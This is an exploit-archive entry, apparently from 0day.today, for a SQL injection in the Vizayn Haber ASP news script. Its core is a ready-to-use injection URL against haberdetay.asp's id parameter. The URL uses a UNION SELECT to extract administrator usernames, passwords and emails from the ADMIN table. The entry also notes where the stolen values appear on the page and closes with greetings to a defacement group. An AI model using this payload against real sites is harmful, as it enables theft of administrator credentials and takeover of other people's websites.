Vizayn Haber (haberdetay.asp id variable) SQL Injection Vulnerability

2007-01-01T00:00:00
ID 1337DAY-ID-1353
Type zdt
Reporter chernobiLe
Modified 2007-01-01T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
Vizayn Haber (haberdetay.asp id variable) SQL Injection Vulnerability
=====================================================================



###############################################################
#Vizayn Haber (tr) == (tr) SQL Injection Vulnerability
#Author : chernobiLe
###############################################################
#Risk : High


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/haberdetay.asp?id=1+union+select+0,PASSWORD,EMAIL,USERNAME+from+ADMIN

#Union data Text;
#Haber Eklenme Tarihi :  USERNAME
#Haber Basligi :               PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM




#  0day.today [2018-03-19]  #